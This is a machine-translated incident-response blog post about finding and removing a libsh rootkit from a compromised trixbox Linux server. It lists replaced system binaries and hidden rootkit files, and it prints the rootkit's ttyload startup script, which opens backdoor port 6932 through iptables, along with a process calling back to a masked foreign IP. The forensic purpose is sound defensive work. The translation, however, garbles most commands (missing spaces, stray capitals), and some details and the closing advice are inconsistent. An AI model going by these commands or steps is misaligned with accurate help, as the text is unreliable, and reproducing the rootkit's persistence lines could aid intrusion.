Zhou haihan/Wen 2009.7.27
A former startup employee suddenly called me and said that a tribox machine was under attack. Considering that I am familiar with Linux, I 'd like to ask for help.
I connected the Linux through the Remote Desktop and found that SSH 2 could not be connected at all. Fortunately, ssh V1 is connected. Check the SSH configuration. If no exception occurs, Restart sshd to check port usage. Netstat cannot see the port on which the program occupies sshd.
CD operation. The root shell main directory is switched to/usr/lib/libsh.
But Ls-L/usr/lib> TMP
Grep libsh TMP
If it is null, libsh is invisible.
If you delete, move, or change the name as root, the system prompts that you do not have the permission.
Rm-RF/usr/lib/libsh
The system prompts that you do not have operation permissions.
PS-Ef saw a suspicious process as follows:
Ls-C <x. x: yyyy>/dev/null 2> & 1
X. x is an IP address, which is located in Poland. Obviously, this IP address is a stepping stone for hackers.
Hackers may remotely send messages through modified ls.
Ls/usr/bin
We found that key processes such as LS, top, PS, and netstat were replaced. The user is not root, but 112, and the user group is 114. These binary files cannot be deleted or modified.
Some operations are as follows:
Find/-nouser
/Etc/Shell/stealth
/Etc/Shell/bash
/Etc/Shell/randfiles
/Etc/Shell/randfiles/randnicks. e
/Etc/Shell/randfiles/randpickup. e
/Etc/Shell/randfiles/randsignoff. e
/Etc/Shell/randfiles/randsay. e
/Etc/Shell/randfiles/randkicks. e
/Etc/Shell/randfiles/randaway. e
/Etc/Shell/randfiles/randversions. e
/Etc/Shell/randfiles/randinsult. e
/Etc/Shell/cyc. Set
/Etc/Shell/cyc. Levels
/Etc/Shell/cyc. Help
/Etc/Shell/cyc. ACC
/Etc/Shell/cyc. PID
/Root/libsh1/hide1
/Root/libsh1/. bashrc
/Usr/bin/Dir
/Usr/bin/find
/Usr/bin/pstree
/Usr/bin/top
/Usr/bin/md5sum
/Bin/netstat
/Bin/PS
/Bin/ls
/Sbin/ttymon
/Sbin/ttyload
/Sbin/ifconfig
[Trixbox1.localdomain. Backup] # pwd
/Root/libsh1/. Backup
[Trixbox1.localdomain. Backup] # ls-l
Total 740
-Rwxr-XR-x 1 Root 93560 Jun 27 0:23 dir
-Rwxr-XR-x 1 Root 151244 Jun 27 0:23 find
-Rwxr-XR-x 1 Root 71528 Jun 27 :23 ifconfig
-Rwxr-XR-x 1 Root 93560 Jun 27 0:23 ls
-Rwxr-XR-x 1 Root 27728 Jun 27 0:23 md5sum
-Rwxr-XR-x 1 Root 121140 Jun 27 0:23 netstat
-R-XR-x 1 Root 79036 Jun 27 PS
-Rwxr-XR-x 1 Root 18644 Jun 27 0:23 pstree
-R-XR-x 1 Root 58104 Jun 27 top
[Trixbox1.localdomain. Backup] # lsattr/bin/PS
S --- Ia -------/bin/PS
[Trixbox1.localdomain. Backup] # chattr-IAU/bin/PS
[Trixbox1.localdomain. Backup] # cp PS/bin /.
CP: overwrite '/bin/./Ps '? Y
[Trixbox1.localdomain. Backup] # chattr-IAU/bin/netstat/bin/ls
[Trixbox1.localdomain. Backup] # cp netstat/bin/netstat
CP: overwrite '/bin/netstat '? Y
[Trixbox1.localdomain. Backup] # cp ls/bin/ls
CP: overwrite '/bin/ls '? Y
[Trixbox1.localdomain. Backup] # chattr-IAU/usr/bin/{top, pstree, Dir, md5sum, find}
[Trixbox1.localdomain. Backup] # cp {top, pstree, Dir, md5sum, find}/usr/bin /.
CP: overwrite '/usr/bin/./top '? Y
CP: overwrite '/usr/bin/./pstree '? Y
CP: overwrite '/usr/bin/./dir '? Y
CP: overwrite '/usr/bin/./md5sum '? Y
CP: overwrite '/usr/bin/./find '? Y
[Trixbox1.localdomain. Backup] # netstat-ANP
Active Internet connections (servers and established)
PROTO Recv-Q send-Q local address foreign address State PID/program name
TCP 0 0 0.0.0.0: 6600 0.0.0.0: * Listen 2030/IRCd
TCP 0 0 0.0.0.0: 3306 0.0.0.0: * Listen 1979/mysqld
TCP 0 0 0.0.0.0: 5038 0.0.0.0: * Listen 2306/Asterisk
TCP 0 0 0.0.0.0: 111 0.0.0.0: * Listen 1651/Portmap
TCP 0 0 0.0.0.0: 1010 0.0.0.0: * Listen 1676/rpc. statd
TCP 0 0 0.0.0.0: 6932 0.0.0.0: * Listen 2440/ttyload
TCP 0 0 10.1.0.13: 3306 60.10.140.68: 3221 established 1979/mysqld
TCP 0 0: 50021: * Listen 1838/sshd
TCP 0 0: 88: * Listen 9351/httpd
TCP 0 0: 443: * Listen 9351/httpd
TCP 0 0: FFFF: 10.1.0.13: 50021: FFFF: 10.1.0.68: 2967 established 10403/2
UDP 0 0 0.0.0.0: 32768 0.0.0.0: * 1790/mDNSResponder
UDP 0 0 0.0.0.0: 5060 0.0.0.0: * 2306/Asterisk
UDP 0 0 0.0.0.0: 69 0.0.0.0: * 1854/xinetd
UDP 0 0 0.0.0.0: 4569 0.0.0.0: * 2306/Asterisk
UDP 0 0 0.0.0.0: 5353 0.0.0.0: * 1790/mDNSResponder
UDP 0 0 0.0.0.0: 1004 0.0.0.0: * 1676/rpc. statd
UDP 0 0 0.0.0.0: 1007 0.0.0.0: * 1676/rpc. statd
UDP 0 0 0.0.0.0: 111 0.0.0.0: * 1651/Portmap
Raw 0 0 0.0.0.0: 1 0.0.0.0: * 7 2447/ttymon
...
[Trixbox1.localdomain. Backup] # ls-L/lib/libsh. So
Total 728
-Rwxr-XR-x 1 Root 722684 Jun 27 :23 bash
-RW-r -- 1 root 114 478 Jun 27 shdcf
-Rwx ------ 1 122 114 525 Apr 17 2003 shhk
-Rwx ------ 1 122 114 329 Apr 17 2003 shhk. Pub
-Rwx ------ 1 122 114 512 Jul 21 SHRs
[Trixbox1.localdomain. Backup] # mv/lib/libsh. So // root/libsh. so_bak
MV: cannot move '/lib/libsh. So/' to '/root/libsh. so_bak': operation not permitted
[Trixbox1.localdomain. Backup] # chattr-IAU/lib/libsh. So/
[Trixbox1.localdomain. Backup] # mv/lib/libsh. So // root/libsh. so_bak
[Trixbox1.localdomain. Backup] # Find/-group 114
/Root/libsh1/. Sniff/shsniff
/Root/libsh1/. Sniff/SHP
/Root/libsh1/hide1
/Root/libsh1/shsb
/Root/libsh1/. bashrc
/Root/libsh. so_bak/shhk. Pub
/Root/libsh. so_bak/shdcf
/Root/libsh. so_bak/shhk
/Root/libsh. so_bak/SHRs
/Usr/bin/Dir
/Usr/bin/find
/Usr/bin/pstree
/Usr/bin/top
/Usr/bin/md5sum
/Bin/netstat
/Bin/PS
/Bin/ls
Find:/proc/25743/task/25743/FD/4: no such file or directory
Find:/proc/25743/FD/4: no such file or directory
/Sbin/ttymon
/Sbin/ttyload
/Sbin/ifconfig
[Trixbox1.localdomain. Backup] # chmod 700/sbin/ifconfig
[Trixbox1.localdomain. Backup] # chown root: Root/sbin/ifconfig
[Trixbox1.localdomain. Backup] # ll/sbin/ifconfig
-Rwx ------ 1 Root 71528 Jul 21 23: 38/sbin/ifconfig
[Trixbox1.localdomain ~] # Vi/etc/inittab
# Run xdm in runlevel 5
X: 5: respawn:/etc/X11/preofdm-nodaemon
# Loading Standard TTYs
0: 2345: Once:/usr/sbin/ttyload
# Run Gettys in standard runlevels
[Trixbox1.localdomain. Backup] # Find/-name "*"-exec grep-L "ttyload "{}/;
/Etc/inittab
/Etc/rc. d/nouser
/Etc/prelink. Cache
/Usr/include/proc. h
/Usr/sbin/ttyload
[Trixbox1.localdomain ~] # Vi/usr/sbin/ttyload
/Sbin/ttyload-q>/dev/null 2> & 1
/Sbin/ttymon>/dev/null 2> & 1
/Sbin/ttylib>/dev/null 2> & 1
/Sbin/iptables-I input-P TCP -- dport 6932-J accept
Iptables-I input-P TCP -- dport 6932-J accept
[Trixbox1.localdomain ~] # Netstat-ANP
Active Internet connections (servers and established)
PROTO Recv-Q send-Q local address foreign address State PID/program name
TCP 0 0 0.0.0.0: 6600 0.0.0.0: * Listen 2030/IRCd
TCP 0 0 0.0.0.0: 3306 0.0.0.0: * Listen 1979/mysqld
TCP 0 0 0.0.0.0: 5038 0.0.0.0: * Listen 2306/Asterisk
TCP 0 0 0.0.0.0: 111 0.0.0.0: * Listen 1651/Portmap
TCP 0 0 0.0.0.0: 1010 0.0.0.0: * Listen 1676/rpc. statd
TCP 0 0 0.0.0.0: 6932 0.0.0.0: * Listen 2440/ttyload // attack !!!
TCP 0 0 10.1.0.13: 3306 60.10.140.68: 3221 established 1979/mysqld
TCP 0 0: 50021: * Listen 1838/sshd
TCP 0 0: 88: * Listen 9351/httpd
TCP 0 0: 443: * Listen 9351/httpd
TCP 0 0: FFFF: 10.1.0.13: 50021: FFFF: 10.1.0.68: 2967 established 10403/0
UDP 0 0 0.0.0.0: 32768 0.0.0.0: * 1790/mDNSResponder
UDP 0 0 0.0.0.0: 5060 0.0.0.0: * 2306/Asterisk
UDP 0 0 0.0.0.0: 69 0.0.0.0: * 1854/xinetd
UDP 0 0 0.0.0.0: 4569 0.0.0.0: * 2306/Asterisk
UDP 0 0 0.0.0.0: 5353 0.0.0.0: * 1790/mDNSResponder
UDP 0 0 0.0.0.0: 1004 0.0.0.0: * 1676/rpc. statd
UDP 0 0 0.0.0.0: 1007 0.0.0.0: * 1676/rpc. statd
UDP 0 0 0.0.0.0: 111 0.0.0.0: * 1651/Portmap
Raw 0 0 0.0.0.0: 1 0.0.0.0: * 7 2447/ttymon
[Trixbox1.localdomain. Backup] # Cat/etc/rc. d/nouser
/Etc/Shell/stealth
/Etc/Shell/bash
/Etc/Shell/randfiles
/Etc/Shell/randfiles/randnicks. e
/Etc/Shell/randfiles/randpickup. e
/Etc/Shell/randfiles/randsignoff. e
/Etc/Shell/randfiles/randsay. e
/Etc/Shell/randfiles/randkicks. e
/Etc/Shell/randfiles/randaway. e
/Etc/Shell/randfiles/randversions. e
/Etc/Shell/randfiles/randinsult. e
/Etc/Shell/cyc. Set
/Etc/Shell/cyc. Levels
/Etc/Shell/cyc. Help
/Etc/Shell/cyc. ACC
/Etc/Shell/cyc. PID
/Root/libsh1/hide1
/Root/libsh1/. bashrc
/Usr/bin/Dir
/Usr/bin/find
/Usr/bin/pstree
/Usr/bin/top
/Usr/bin/md5sum
/Bin/netstat
/Bin/PS
/Bin/ls
/Sbin/ttymon
/Sbin/ttyload
/Sbin/ifconfig
[Trixbox1.localdomain. Backup] # Cat/usr/include/proc. h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 ttylib
3 shsniff
3 ttymon
3 shsb
3 SHP
3 hide
4 ttyload
The above section shows how to modify the/usr/lib/libsh attributes and move them to the/root directory to find out which files may be infected by the rootkit. We can see that the infected files are very complicated. All core files point to ttyload. /Usr/lib/libsh contains a hidden directory. backup should be a correct backup of the original binary file, so while modifying properties, while restoring ls, top, netstat, PS and other key binary executable files.
Finally, replace or delete all infected files to a clean version to restore the sshd V2 connection. In crontab, the log code is cleared once a minute, in the inittab file, ttyload code is automatically cleared. Ask them to use tools like Nessus and cktoolkit to scan for vulnerabilities. You are not sure whether it is a system vulnerability, an asterisk vulnerability, or an HTTP vulnerability in PHP. Patch the patch to avoid further attacks.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
